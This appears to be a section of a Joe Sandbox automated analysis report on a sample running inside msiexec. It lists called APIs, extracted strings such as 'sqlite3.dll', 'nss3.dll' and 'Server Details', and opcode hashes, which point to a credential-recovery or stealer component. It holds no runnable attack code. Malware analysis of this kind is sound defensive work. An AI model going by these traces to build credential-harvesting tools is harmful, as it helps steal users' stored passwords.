                                                                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                      • String ID: Ul@
                                                                                                      • API String ID: 270934217-715280498
                                                                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                      APIs
                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                      • sprintf.MSVCRT ref: 0040B929
                                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                      • sprintf.MSVCRT ref: 0040B953
                                                                                                      • _mbscat.MSVCRT ref: 0040B966
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 203655857-0
                                                                                                      • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                      • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                      • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                      • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                      APIs
                                                                                                        • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                      Strings
                                                                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                      • String ID: recovered %d pages from %s
                                                                                                      • API String ID: 985450955-1623757624
                                                                                                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ultoasprintf
                                                                                                      • String ID: %s %s %s
                                                                                                      • API String ID: 432394123-3850900253
                                                                                                      • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                      • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00409919
                                                                                                      • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendmemset
                                                                                                      • String ID: N\@
                                                                                                      • API String ID: 568519121-3851889168
                                                                                                      • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                      • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                      • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                      • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                      APIs
                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                      • String ID: menu_%d
                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _msizerealloc
                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                      • strrchr.MSVCRT ref: 00409808
                                                                                                      • _mbscat.MSVCRT ref: 0040981D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                                      • String ID: _lng.ini
                                                                                                      • API String ID: 3334749609-1948609170
                                                                                                      • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                      • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                      • String ID: sqlite3.dll
                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                      • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                      • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                      APIs
                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString
                                                                                                      • String ID: A4@$Server Details
                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                      • memset.MSVCRT ref: 0042C932
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,682F7B60,?,00000000), ref: 0040858F
                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,682F7B60,?,00000000), ref: 004085BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3110682361-0
                                                                                                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3510742995-0
                                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                      APIs
                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1860491036-0
                                                                                                      • Opcode ID: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                                                      • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                      • Opcode Fuzzy Hash: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                                                      • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040797A
                                                                                                      • free.MSVCRT ref: 0040799A
                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                      • free.MSVCRT ref: 004079BD
                                                                                                      • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3669619086-0
                                                                                                      • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                      • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59